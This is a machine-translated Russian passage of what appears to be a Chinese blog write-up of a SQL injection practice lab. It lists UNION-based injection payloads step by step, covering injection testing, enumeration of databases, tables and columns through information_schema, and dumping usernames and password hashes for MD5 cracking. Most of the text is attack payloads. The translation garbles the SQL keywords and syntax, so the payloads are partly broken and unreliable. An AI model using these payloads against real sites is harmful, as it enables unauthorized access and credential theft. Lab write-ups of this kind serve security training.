Стенографический https://www.dazhuanlan.com/2019/08/25/5d62593d1d0a1/
Посетите веб - страницу, выделите ввести в нижней части объявления посадки, точка инъекции тест
? Id = 1 и 1 = 1 возвращается к нормальной ,? Id = 1 и 1 = 2 возвращает ошибку, указывая на точку впрыска. 
? Идентификационный номер = 1 заказ на 5 столбца запроса. Не было уменьшено, пока страница вернется к нормальному 
? Id = 1 и 1 = 2 союз выбрать 1, вариант (), базы данных (), 4 версии запроса и имя базы данных
( на этот раз , чтобы знать , что база данных mozhe_Discuz_StormGroup)
? Вышеупомянутый ID = 1 и 1 = 2 Союза выберите 1, schema_name, 3,4 от information_schema.schemata предела 0,1 запроса базы данных с использованием limit0,1 1 указывает на начало строки выборки данных от 0 - й строке. 
? ID = 1 и 1 = 2 Объединение выберите 1, schema_name, 3,4 из information_schema.schemata предела 1,1 запроса к базе данных с использованием выборки ограничить 1,1 указывает на данные линии старта с первого ряда. 
? ID = 1 и 1 = 2 Объединение выберите 1, schema_name, 3,4 из information_schema.schemata предела 2,1 запроса к базе данных с помощью выборки ограничить 2,1 указывает на данные линии старта от второй линии. 
? ID = 1 и 1 = 2 Объединение выберите 1, schema_name, 3,4 от information_schema.schemata предела 3,1 запроса базы данных с помощью предельного 3,1 указывает на линию старта 31 , взятый из данных строки.
? ID = 1 и 1 = 2 Объединение выберите 1, schema_name, 3,4 от information_schema.schemata предел 4,1 запроса к базе данных, с использованием выборки указывает на то ограничить 4,1 данные линии старта из линии 1 4. 
? ID = 1 и 1 = 2 Объединение выберите 1, table_name, 3,4 из INFORMATION_SCHEMA.TABLES , где table_schema = '' mozhe_Discuz_StormGroup имя таблицы предела 0,1 запросов к базе данных mozhe_Discuz_StormGroup, выбирает строку данных из строки 0
(в это время знать таблицу базы данных StromGroup_member)
? указанное выше ID = 1 и 1 = 2 ВЫБОР Союза 1, table_name, 3, 4 от лимита WHERE INFORMATION_SCHEMA.TABLES table_schema = 'mozhe_Discuz_StormGroup' 1, 1 запроса имени таблицы mozhe_Discuz_StormGroup базы данных, из первого линия выбирает строку данных 
? ID = 1 и 1 = 2 Объединения выбора 1, table_name, 3,4 из INFORMATION_SCHEMA.TABLES , где table_schema = «» mozhe_Discuz_StormGroup предел имени запроса таблицы базы данных 2,1 mozhe_Discuz_StormGroup, выбирает строку из второго ряда данные, возвращается сообщение об ошибке, указывающее , что только две таблицы.
? ID = 1 и 1 = 2 Объединение выбора 1, содержимое поля column_name, COLUMN_TYPE, 4 из INFORMATION_SCHEMA.COLUMNS , где table_name = '' StormGroup_member предел 0,1 StormGroup_member запроса таблицы, выбирает строку данных из строки 0 
? ID = 1 и 1 = 2 Объединения выберите 1, имя_столбец, COLUMN_TYPE, 4 из INFORMATION_SCHEMA.COLUMNS , где table_name = '' StormGroup_member содержимое полей ограничивают 1,1 StormGroup_member таблицы запроса, выбирает строку данных из первой строки. 1 
? =. 1 и 2. ID = 1 объединение выберите 1, column_name, COLUMN_TYPE, 4 от INFORMATION_SCHEMA.COLUMNS , где table_name = '' StormGroup_member предельное содержание поля StormGroup_member 2,1 таблица запроса, строка данных , взятых из линии 2 
? =. 1 и J = 1. 2. 1 SELECT , соединение, имя_столбца, COLUMN_TYPE, 4 из INFORMATION_SCHEMA.COLUMNS , где table_name = «» StormGroup_member предельного содержимого поля StormGroup_member 3,1 таблицы запроса, выбирает строку данных из третьей строки
? ID = 1 и 1 = 2 Объединение выберите 1, CONCAT (имя, '-', пароль, '-', статус), 3,4 от 0,1 mozhe_Discuz_StormGroup.StormGroup_member ограничение приобретает значение 0 - й строки 
ID = 1 и? 1 = 2 Объединения выберите 1, CONCAT (имя, '-', пароль, '-', статус), 3,4 из mozhe_Discuz_StormGroup.StormGroup_member ограничить 1,1 приобретение первого значение строки 
md5 расшифровано, чтобы получить ключ авторизации.
